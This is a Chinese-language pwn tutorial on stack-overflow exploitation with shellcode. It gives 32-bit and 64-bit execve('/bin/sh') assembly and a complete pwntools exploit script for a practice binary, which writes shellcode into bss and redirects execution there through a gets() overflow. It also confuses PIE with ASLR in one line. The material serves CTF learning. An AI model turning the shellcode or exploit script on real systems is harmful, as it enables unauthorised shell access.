二进制学习（pwn）-shellcode-Toy模板网

这篇具有很好参考价值的文章主要介绍了二进制学习（pwn）-shellcode。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

安装好了pwntool、ROPgadget、onegadget以及pwngdb,读懂并手写脚本复现了上一篇中基于64位有后门的栈溢出漏洞，恭喜你少年，你已经完成二进制的筑基啦。接下来，我们要介绍的是栈溢出的第二种利用形式：基于shellcode的栈溢出。

在编程语言中要想获得系统执行权限，可以使用system('/bin/sh')。该函数是基于系统函数execve('/bin/sh',0,0)，编译为机器码后运行就可以getshell。而shellcode就相当于execve('/bin/sh',0,0)的机器码，如果程序中没有提供类似于system('/bin/sh')这样的后门，那么我们完全可以向一个具有可执行权限的内存区域中传入shellcode来达到同样的效果。

32位shellcode编写

32位系统调用命令是int 0x80，execve的调用号是0xb（由eax记录），三个参数'/bin/sh',0,0分别由ebx,ecx和edx记录。

section .text    global _start_start:    xor ecx,ecx;    xor edx,edx;    xor eax,eax;    push eax;#使得/bin/sh后面出现00，截断字符串    push "//sh";#占位防止出现00    push "/bin";    mov ebx,esp;    mov al,0xb;#直接将0xb赋值给eax高位,防止高位补0    int 0x80;

64位shellcode编写

64位系统调用命令是syscall，execve的调用号是59（由rax记录），三个参数'/bin/sh',0,0分别由rdi,rsi和rdx记录。

section .text    global _start_start:    xor rsi,rsi;    xor rdx,rdx;    xor rbx,rbx;#传入00，便于截断    push rbx;    mov rbx,"/bin//sh";#长度超过32位，只能通过寄存器传参，加/补位    push rbx;    mov rdi,rsp;    mov al,59;    syscall;

以上两种shellcode都是采用系统调用实现execve('/bin/sh',0,0),能理解即可，不用刻意去记。当然不理解也没关系，pwntool中内置了生成shellcode的函数。在32位环境下使用asm(shellcraft.sh())，在64位环境下使用asm(shellcraft.amd64.sh())，即可生成shellcode。

下面给出一道基于shellcode的64位栈溢出例题，结合题目直观了解一下shellcode的使用方法。

二进制学习（pwn）-shellcode

可以看到程序中存在两个输入函数，read()和gets()。read输入函数的数据存在name处，且name位于bss段。

二进制学习（pwn）-shellcode

gets输入函数的数据则放在栈中，由于对输入长度没有限制，所以存在栈溢出。

二进制学习（pwn）-shellcode

当程序没有开启pie时，栈的位置是随机的，但是bss段的地址是固定的。因此本题的思路是在第一个输入函数read()处放shellcode，在第二个输入函数gets()处栈溢出调整到bss段，执行shellcode获取服务权限。

#!/usr/bin/python#coding=utf-8from pwn import *from LibcSearcher import *
local_file  = 'level1'#choose right lib according to the elflocal_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'#local_libc  = '/lib/i386-linux-gnu/libc-2.23.so'remote_libc = local_libcis_local = Falseis_remote = False
if len(sys.argv) == 1:    is_local = True    p = process(local_file)    libc = ELF(local_libc)elif len(sys.argv) > 1:    is_remote = True    if len(sys.argv) == 3:        host = sys.argv[1]        port = sys.argv[2]    else:        host, port = sys.argv[1].split(':')    p = remote(host, port)    libc = ELF(remote_libc)
elf = ELF(local_file)context.log_level = 'debug'context.arch = elf.archp.recvuntil("tell me your name\n")payload=asm(shellcraft.amd64.sh())p.sendline(payload)p.recvuntil("What do you want to say to me?\n")payload="A"*0x28+p64(0x601080)p.sendline(payload)p.interactive()